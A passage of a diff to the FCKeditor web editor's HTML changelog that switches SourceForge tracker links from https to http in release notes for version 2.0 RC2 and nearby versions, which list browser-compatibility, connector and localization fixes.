href="https://sourceforge.net/tracker/index.php?func=detail&aid=1082433&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1108167&group_id=75348&atid=543653">SF + BUG-1108167</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1085149&group_id=75348&atid=543653">SF + BUG-1085149</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1151296&group_id=75348&atid=543653">SF + BUG-1151296</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1082433&group_id=75348&atid=543653">SF BUG-1082433</a>] No more IFRAMEs without src attribute. Now it points to a blank page located in the editor's package. In this way we avoid security warnings when using the editor over HTTPS. Thanks to Guillermo Bozovich. </li> @@ -1965,20 +1965,20 @@ </li> <li>The XHTML processor was duplicating the text on some specific situation. It has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1090213&group_id=75348&atid=543655">SF - Patch-1090213</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1098929&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1090213&group_id=75348&atid=543655">SF + Patch-1090213</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1098929&group_id=75348&atid=543653">SF Patch-1098929</a>] With ASP, the editor now works correctly on pages using "Option Explicit". Thanks to Ben Noblet. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1100759&group_id=75348&atid=543653">SF - BUG-1100759</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1029125&group_id=75348&atid=543653">SF - BUG-1029125</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=966130&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1100759&group_id=75348&atid=543653">SF + BUG-1100759</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1029125&group_id=75348&atid=543653">SF + BUG-1029125</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=966130&group_id=75348&atid=543653">SF BUG-966130</a>] The editor was not working with old IE 5.5 browsers. There was a problem with the XML parser. It has been fixed. </li> <li>The localization engine is now working correctly over IE 5.5 browsers. </li> <li>Some commands where not working well over IE 5.5 (emoticons, image,...). It has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1146441&group_id=75348&atid=543653">SF - BUG-1146441</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1149777&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1146441&group_id=75348&atid=543653">SF + BUG-1146441</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1149777&group_id=75348&atid=543653">SF BUG-1149777</a>] The editor now uses the TEXTAREA id in the ReplaceTextarea function. If the id is now found, it uses the "name". The docs have been updated. </li> @@ -1986,26 +1986,26 @@ BUG-1144297</a>] Some corrections have been made to the Dutch language file. Thanks to Erwin Dondorp. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1121365&group_id=75348&atid=543653">SF - BUG-1121365</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1090102&group_id=75348&atid=543653">SF - BUG-1090102</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1152171&group_id=75348&atid=543653">SF - BUG-1152171</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1102907&group_id=75348&atid=543653">SF + BUG-1121365</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1090102&group_id=75348&atid=543653">SF + BUG-1090102</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1152171&group_id=75348&atid=543653">SF + BUG-1152171</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1102907&group_id=75348&atid=543653">SF BUG-1102907</a>] There is no problem now to start the editor with values like "<div></div>" or "<p></p>". </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1114059&group_id=75348&atid=543653">SF - BUG-1114059</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1041861&group_id=75348&atid=543653">SF + BUG-1114059</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1041861&group_id=75348&atid=543653">SF BUG-1041861</a>] The click on the disabled options in the Context Menu has no effects now. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1152617&group_id=75348&atid=543653">SF - BUG-1152617</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1102441&group_id=75348&atid=543653">SF - BUG-1102441</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1095312&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1152617&group_id=75348&atid=543653">SF + BUG-1152617</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1102441&group_id=75348&atid=543653">SF + BUG-1102441</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1095312&group_id=75348&atid=543653">SF BUG-1095312</a>] Some problems when setting the editor source to very specific values has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1093514&group_id=75348&atid=543653">SF - BUG-1093514</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1089204&group_id=75348&atid=543653">SF - BUG-1089204</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1077609&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1093514&group_id=75348&atid=543653">SF + BUG-1093514</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1089204&group_id=75348&atid=543653">SF + BUG-1089204</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1077609&group_id=75348&atid=543653">SF BUG-1077609</a>] The editor now runs correctly if called directly (locally) without a server installation (just opening the HTML sample files). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1088248&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1088248&group_id=75348&atid=543653">SF BUG-1088248</a>] The editor now uses a different method to load its contents. In this way the URLs remain untouched. </li> <li>The PHP integration file now detects Internet Explorer 5.5 correctly.</li> @@ -2013,15 +2013,15 @@ <h3> Version 2.0 RC2 (Release Candidate 2)</h3> <ul> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1042034&group_id=75348&atid=543656">SF - Feature-1042034</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1075961&group_id=75348&atid=543656">SF - Feature-1075961</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1083200&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1042034&group_id=75348&atid=543656">SF + Feature-1042034</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1075961&group_id=75348&atid=543656">SF + Feature-1075961</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1083200&group_id=75348&atid=543656">SF Feature-1083200</a>] A new dialog window for the <strong>table cell properties</strong> is now available (right-click). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1042034&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1042034&group_id=75348&atid=543656">SF Feature-1042034</a>] The new "<strong>Split Cell</strong> ", to split a table cell in two columns, has been introduced (right-click). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1042034&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1042034&group_id=75348&atid=543656">SF Feature-1042034</a>] The new "<strong>Merge Cells</strong>", to merge table cells (in the same row), has been introduced (right-click). </li> <li>The "fake" <strong>TAB key support</strong> (available by default over @@ -2031,13 +2031,13 @@ <li>It now possible to tell IE to send a <strong><BR></strong> when the user presses the <strong>Enter key</strong>. Take a look at the FCKConfig.UseBROnCarriageReturn configuration setting. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1085422&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1085422&group_id=75348&atid=543656">SF Feature-1085422</a>] <strong>ColdFusion</strong>: The <strong>File Manager connector</strong> is now available! (Thanks to Hendrik Kramer). </li> <li>The editor is now available in <strong>29 languages!</strong> The new language files available are: <ul> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1067775&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1067775&group_id=75348&atid=543656">SF Feature-1067775</a>] <strong>Chinese Simplified and Traditional</strong> (Taiwan and Hong Kong) (by NetRube). </li> <li><strong>Czech</strong> (by David Horák). </li> @@ -2050,34 +2050,34 @@ </ul> </li> <li>Updates to the <strong>French</strong> language files (by Hubert Garrido). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1085816&group_id=75348&atid=543653">SF - BUG-1085816</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1083743&group_id=75348&atid=543653">SF - BUG-1083743</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1078783&group_id=75348&atid=543653">SF - BUG-1078783</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1077861&group_id=75348&atid=543653">SF - BUG-1077861</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1077861&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1085816&group_id=75348&atid=543653">SF + BUG-1085816</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1083743&group_id=75348&atid=543653">SF + BUG-1083743</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1078783&group_id=75348&atid=543653">SF + BUG-1078783</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1077861&group_id=75348&atid=543653">SF + BUG-1077861</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1077861&group_id=75348&atid=543653">SF BUG-1037404</a>] Many small bugs in the XHTML processor has been corrected (workarounds to browser specific bugs). These are some things to consider regarding the changes: <ul> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1083744&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1083744&group_id=75348&atid=543653">SF BUG-1083744</a>] On Gecko browsers, any element attribute that the name starts with "_moz" will be ignored. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1060073&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1060073&group_id=75348&atid=543653">SF BUG-1060073</a>] The <STYLE> and <SCRIPT> elements contents will be handled as is, without CDATA tag surrounding. This may break XHTML validation. In any case the use of external files for scripts and styles is recommended (W3C recommendation).</li> </ul> </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1088310&group_id=75348&atid=543653">SF - BUG-1088310</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1078837&group_id=75348&atid=543653">SF - BUG-1078837</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=999792&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1088310&group_id=75348&atid=543653">SF + BUG-1088310</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1078837&group_id=75348&atid=543653">SF + BUG-1078837</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=999792&group_id=75348&atid=543653">SF BUG-999792</a>] URLs now remain untouched when initializing the editor or switching from WYSYWYG to Source and vice versa. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1082323&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1082323&group_id=75348&atid=543653">SF BUG-1082323</a>] The problem in the ASP and PHP connectors when handling non "strange" chars in file names has been corrected. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1085034&group_id=75348&atid=543653">SF - BUG-1085034</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1076796&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1085034&group_id=75348&atid=543653">SF + BUG-1085034</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1076796&group_id=75348&atid=543653">SF BUG-1076796</a>] Some bugs in the PHP connector have been corrected. </li> <li>A problem with the "Format" command on IE browsers on languages different of English has been solved. The negative side of this correction is that due to @@ -2087,7 +2087,7 @@ command, the image handles still appear, even if the image is not available anymore (this is a Gecko bug). When clicking in a "phanton" randle, the browser crashes. It doesn't happen (the crash) anymore. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1082197&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1082197&group_id=75348&atid=543653">SF BUG-1082197</a>] On ASP, the bug in the browser detection system for Gecko browsers has been corrected. Thanks to Alex Varga. </li> <li>Again on ASP, the browser detection for IE had some problems on servers that use @@ -2095,24 +2095,24 @@ </li> <li>No error is thrown now when non existing language is configured in the editor. The English language file is loaded in that case. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1077747&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1077747&group_id=75348&atid=543653">SF BUG-1077747</a>] The missing images on the Office2003 and Silver skins are now included in the package. </li> <li>On some Gecko browsers, the dialog window was not loading correctly. I couldn't reproduce the problem, but a fix has been applied based on users tests. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1004078&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1004078&group_id=75348&atid=543653">SF BUG-1004078</a>] ColdFusion: The "config" structure/hash table with keys and values is in ColdFusion not(!) case sensitive. All keys returned by ColdFusion are in upper case format. Because the FCKeditor configuration keys must be case sensitive, we had to match all structure/hash keys with a list of the correct configuration names in mixed case. This has been added to the fckeditor.cfc and fckeditor.cfm. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1075166&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1075166&group_id=75348&atid=543653">SF BUG-1075166</a>] ColdFusion: The "fallback" variant of the texteditor (<textarea>) has a bug in the fckeditor.cfm. This has been fixed. </li> <li>A typo in the Polish language file has been corrected. Thanks to Pawel Tomicki. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1086370&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1086370&group_id=75348&atid=543653">SF BUG-1086370</a>] A small coding type in the Link dialog window has been corrected. </li> </ul> @@ -2123,7 +2123,7 @@ </li> <li><strong>PHP</strong> support is now available (including the File Manager connector). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1063217&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1063217&group_id=75348&atid=543656">SF Feature-1063217</a>] The new advanced <strong>Style</strong> command is available in the toolbar: full preview, context sensitive, style definitions are loaded from a XML file (see documentation for more instructions). </li> @@ -2144,101 +2144,101 @@ simple ampersands (&) on attributes (like the links href) instead of its entity &amp;. Just set FCKConfig.ForceSimpleAmpersand = true in the configuration file. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1026866&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1026866&group_id=75348&atid=543656">SF Feature-1026866</a>] The "<strong>EditorAreaCSS</strong>" configuration option has been introduced. In this way you can set the CSS to use in the editor (editable area). </li> <li>The editing area is not anymore clipped if the toolbar is too large and exceeds the window width. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1064902&group_id=75348&atid=543653">SF - BUG-1064902</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1033933&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1064902&group_id=75348&atid=543653">SF + BUG-1064902</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1033933&group_id=75348&atid=543653">SF BUG-1033933</a>] The editor <strong>interface</strong> is now completely <strong>localizable</strong>. The version ships with 19 languages including: <b>Arabic</b>, <b>Bosnian</b>, <b>Catalan</b>, <b>English</b>, <b>Spanish</b>, <b>Estonian</b>, <b>Finnish</b>, <b>French</b>, <b>Greek</b>, <b>Hebrew</b>, <b>Croatian</b>, <b>Italian</b>, <b>Korean</b>, <b>Lithuanian</b>, <b>Norwegian</b>, <strong>Polish</strong>, <strong>Serbian (Cyrillic)</strong>, <strong>Serbian (Latin)</strong> and <strong>Swedish</strong>.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1027858&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1027858&group_id=75348&atid=543653">SF BUG-1027858</a>] Firefox 1.0 PR introduced a bug that made the editor stop working on it. A workaround has been developed to fix the problem. </li> <li>There was a positioning problem over IE with the color panel. It has been corrected. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1049842&group_id=75348&atid=543653">SF - BUG-1049842</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1033832&group_id=75348&atid=543653">SF - BUG-1033832</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1028623&group_id=75348&atid=543653">SF - BUG-1028623</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1026610&group_id=75348&atid=543653">SF - BUG-1026610</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1064498&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1049842&group_id=75348&atid=543653">SF + BUG-1049842</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1033832&group_id=75348&atid=543653">SF + BUG-1033832</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1028623&group_id=75348&atid=543653">SF + BUG-1028623</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1026610&group_id=75348&atid=543653">SF + BUG-1026610</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1064498&group_id=75348&atid=543653">SF BUG-1064498</a>] The combo commands in the toolbar were not opening in the right way. It has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1053399&group_id=75348&atid=543653">SF - BUG-1053399</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=965318&group_id=75348&atid=543653">SF - BUG-965318</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1018296&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1053399&group_id=75348&atid=543653">SF + BUG-1053399</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=965318&group_id=75348&atid=543653">SF + BUG-965318</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1018296&group_id=75348&atid=543653">SF BUG-1018296</a>] The toolbar buttons icons were not showing on some IE and Firefox/Mac installations. It has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1054621&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1054621&group_id=75348&atid=543653">SF BUG-1054621</a>] Color pickers are now working with the "office2003" and "silver" skins. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1054108&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1054108&group_id=75348&atid=543653">SF BUG-1054108</a>] IE doesn’t recognize the "&apos;" entity for apostrophes, so a workaround has been developed to replace it with "&#39;" (its numeric entity representation). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=983434&group_id=75348&atid=543653">SF - BUG-983434</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=983398&group_id=75348&atid=543653">SF - BUG-983398</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1028103&group_id=75348&atid=543653">SF - BUG-1028103</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1072496&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=983434&group_id=75348&atid=543653">SF + BUG-983434</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=983398&group_id=75348&atid=543653">SF + BUG-983398</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1028103&group_id=75348&atid=543653">SF + BUG-1028103</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1072496&group_id=75348&atid=543653">SF BUG-1072496</a>] The problem with elements with name "submit" inside the editor's form has been solved. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1018743&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1018743&group_id=75348&atid=543653">SF BUG-1018743</a>] The problem with Gecko when collapsing the toolbar while in source mode has been fixed. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1065268&group_id=75348">SF - BUG-1065268</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1034354&group_id=75348&atid=543653">SF + BUG-1065268</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1034354&group_id=75348&atid=543653">SF BUG-1034354</a>] The XHTML processor now doesn’t use the minimized tag syntax (like <br/>) for empty elements that are not marked as EMPTY in the W3C XHTML DTD specifications. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1029654&group_id=75348&atid=543653">SF - BUG-1029654</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1046500&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1029654&group_id=75348&atid=543653">SF + BUG-1029654</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1046500&group_id=75348&atid=543653">SF BUG-1046500</a>] Due to a bug on Gecko there was a problem when creating links. It has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1065973&group_id=75348&atid=543653">SF - BUG-1065973</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=999792&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1065973&group_id=75348&atid=543653">SF + BUG-1065973</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=999792&group_id=75348&atid=543653">SF BUG-999792</a>] The editor now handles relative URLs in IE. In effect IE transform all relative URLs to absolute links, pointing to the site the editor is running. So now the editor removes the protocol and host part of the link if it matches the running server. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1071824&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1071824&group_id=75348&atid=543653">SF BUG-1071824</a>] The color dialog box bug has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1052856&group_id=75348&atid=543653">SF - BUG-1052856</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1046493&group_id=75348&atid=543653">SF - BUG-1046493</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1023530&group_id=75348&atid=543653">SF - BUG-1023530</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1025978&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1052856&group_id=75348&atid=543653">SF + BUG-1052856</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1046493&group_id=75348&atid=543653">SF + BUG-1046493</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1023530&group_id=75348&atid=543653">SF + BUG-1023530</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1025978&group_id=75348&atid=543653">SF BUG-1025978</a>] The editor now doesn’t throw an error if no selection was made and the create link command is used. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1036756&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1036756&group_id=75348&atid=543653">SF BUG-1036756</a>] The XHTML processor has been reviewed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1029101&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1029101&group_id=75348&atid=543653">SF BUG-1029101</a>] The Paste from Word feature is working correctly. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1034623&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1034623&group_id=75348&atid=543653">SF BUG-1034623</a>] There is an IE bug when setting the editor value to "<p><hr></p>". A workaround has been developed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1052695&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1052695&group_id=75348&atid=543653">SF BUG-1052695</a>] There are some rendering differences between Netscape and Mozilla. (Actually that is a bug on both browsers). A workaround has been developed to solve it. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1073053&group_id=75348&atid=543653">SF - BUG-1073053</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1050394&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1073053&group_id=75348&atid=543653">SF + BUG-1073053</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1050394&group_id=75348&atid=543653">SF BUG-1050394</a>] The editor doesn’t throw errors when hidden. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1066321&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1066321&group_id=75348&atid=543653">SF BUG-1066321</a>] Scrollbars should not appear on dialog boxes (at least for the Image and Link ones). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1046490&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1046490&group_id=75348&atid=543653">SF BUG-1046490</a>] Dialogs now are forced to show on foreground over Mac. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1073955&group_id=75348">SF BUG-1073955</a>] A small bug in the image dialog window has been corrected. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1049534&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1049534&group_id=75348&atid=543653">SF BUG-1049534</a>] The Resources Browser window is now working well over Gecko browsers. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1036675&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1036675&group_id=75348&atid=543653">SF BUG-1036675</a>] The Resources Browser window now displays the server error on bad installations.</li> </ul> @@ -2248,7 +2248,7 @@ <li>There is a new configuration - "<strong>GeckoUseSPAN</strong>" - that can be used to tell Gecko browsers to use <SPAN style...> or <B>, 